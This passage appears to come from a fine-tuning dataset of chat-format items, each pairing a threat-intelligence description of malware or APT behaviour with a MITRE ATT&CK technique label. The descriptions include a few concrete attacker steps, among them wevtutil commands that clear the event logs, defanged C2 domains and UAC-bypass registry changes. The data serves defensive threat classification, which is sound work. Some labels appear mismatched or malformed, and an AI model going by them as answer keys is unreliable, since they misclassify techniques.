- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At this point, the script establishes an HTTP connection to the C2 server. If the server response is comprised only of the same GUID that the malware sent, the script deletes itself. In the case of the second-stage script from Variant A, the script deletes the registry key where it is installed. In the case of Variant C, the script deletes the file from which it is running. If instead the server responds with any data other than the GUID, the second-stage script decrypts the data and saves it as a file"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise', 'T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpyNote is similar to Droidjack and is also a commercial RAT. It is powerful and provides convenient management tools.. At present, the price of different versions on the official websited is $499 and $4000 respectively."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An interesting fact is that the ransomware enumerates all running processes and compares the hashed name of each process with embedded hash values"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT can uninstall itself, including deleting its executable."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has used AES-256 and 3DES for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Lazarus Group malware uses a list of ordered port numbers to choose a port for C2 traffic, creating port-protocol mismatches."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockerGoga has been observed changing account passwords and logging off current users."
- },
- {
- "role": "assistant",
- "content": "T1531 - Account Access Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has exfiltrated stolen data to the MEGA file sharing site."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can gather information on the network configuration of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has staged collected data files under \"C:\\Program Files\\Common Files\\System\\Ole DB\\\"."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has acquired credentials from the SAM/SECURITY registry hives."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA gathers information about the OS architecture, OS name, and OS version/Service pack."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The BONDUPDATER script, which was named based on the hard-coded string “B007”, uses a custom DGA algorithm to generate subdomains for communication with the C2 server"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "certutil has been used to decode binaries hidden inside certificate files as Base64 information."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Donut can download and execute previously staged shellcode payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke can securely delete files by first writing random data to the file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use self signed Java applets to execute signed applet attacks."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can decompress and decrypt DLLs and shellcode."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can record sound using input audio devices."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal used multiple lure documents to entice their victims to open and then be infected with Bisonal malware. Finally, in 2018, Ahnlab released a paper about \"Operation Bitter Biscuit\" where Bisonal was used against Korean and Japanese entities. This is an application document that has been used to provide a decoy to the Bisonal malware. The attacker also implemented a new order: execution of a command by using named pipe to get the output of the executed command. This mechanism allows the malware to execute API functions without ever using the Call instruction, making it difficult to perform the analysis. So that it ensures the thread has a chance to run, it will return the API call sleep() no matter what was originally requested. Office Extension . In 2019, the actor behind Bisonal used a new way to deploy the machine on the target's systems. The purpose of the malware is to deploy Bisonal on the infected system ($tmp$\\tmplogon.exe) and to create a Run registry key in order to execute Bisonal at the next reboot of the system. The attacker implements indirect API calls by using GetProcAddress() and LoadLibrary() API. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST created VBScripts that were named after existing services or folders to blend into legitimate activities."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volatile Cedar can deploy additional tools."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Enables remote login - Enables screen sharing - Configures remote login permissions for the user - Allows remote login to all - Enables a hidden “root” account in macOS and sets the password specified in the Trojan code"
- },
- {
- "role": "assistant",
- "content": "T1569.001 - System Services: Launchctl"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has set up and operated websites to gather information and deliver malware."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Observed vulnerabilities include: CVE-2012-0158 CVE-2017-0199 CVE-2017-8759 CVE-2017-11882 Figure 2: APT40 attack lifecycle Establish Foothold APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory’s content via ReadProcessMemory() API two chunks at a time. It then captures Track 1 and Track 2 credit card (CC) data. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. Other versions may just encode the plain Credit Card Data it with Base64"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has been signed with code-signing certificates such as CodeRipper."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As can be seen in the figure above, the packer used for CVE-2019-0803 is very similar to the one used in CVE-2017-0005. The file was compiled on September 18, 2018, and is also internally named “Add.dll”. Like the previously packed exploit, CVE-2019-0803 also has an export function named “AddByGod” and contains debug information"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unique User-Agents The unique User-Agents used in the HTTP communication between SpeakUp to the C&C are a possible path to the identity of the threat actor behind this campaign"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives."
- },
- {
- "role": "assistant",
- "content": "T1564.006 - Run Virtual Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another interesting finding is that Bazar Loader has now implemented a Domain Generation Algorithm using the current date as a seed"
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT uses Expand to decompress a CAB file into executable content."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The directory creation. Downloading the Payloads The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has decrypted packed DLLs with an XOR key."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike has the ability to accept a value for HTTP Host Header to enable domain fronting."
- },
- {
- "role": "assistant",
- "content": "T1090.004 - Domain Fronting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Discovery of a Stealthy New Malware: “CSPY Downloader” is a tool designed to evade analysis and download additional payloads"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of achieve persistence by using DLL search order hijacking, usually by copying the DLL file to %SYSTEMROOT% (C:\\WINDOWS\\ntshrui.dll)."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We detect the attachment file as W97M/Adnel or MHT/Dloader. This macro malware is usually attached in the spam emails as .doc files. It uses social engineering tricks to be able to run the malicious macro script that is disabled by default in Microsoft Office."
- },
- {
- "role": "assistant",
- "content": "T1586.001 - Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker checks for specific registry keys related to the \"UCOMIEnumConnections\" and \"IActiveScriptParseProcedure32\" interfaces."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has obtained and used open source scripts from GitHub."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee’s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. This IP and msoffice-cdn[.]com were both previously referenced in our first report on an OilRig attack using the ThreeDollars delivery document. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. We provide more on the specific usage of these protocols as we discuss the inner workings of this malware in this section"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The White Company has obfuscated their payloads through packing."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete files off the system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Evilnum can steal cookies and session information from browsers."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stores itself in ~/Library/.DS_Stores/"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors. The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. This is thematically similar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and BAE Systems with job openings. LockHeed Recruitment Lure . The macro uses aliases to rename the APIs that it uses (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command. Additional vendors have also identified a variant that uses pcalua.exe. Additional vendors have reported on the current campaign while attributing it to Lazarus. Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses reflective DLL injection to inject the malicious library and execute the RAT."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore creates a new key pair with \"ssh-keygen\" and drops the newly created user key in \"authorized_keys\" to enable remote login."
- },
- {
- "role": "assistant",
- "content": "T1098.004 - SSH Authorized Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Creates a new registry key HKCU\\Software\\Classes\\Folder\\shell\\open\\command - Sets the “Default” value to “path of the malware” - Creates a value “DelegateExecute” and sets the value to “0” - Executes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ngrok can provide DGA for C2 servers through the use of random URL strings that change every 12 hours."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of downloading remote files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
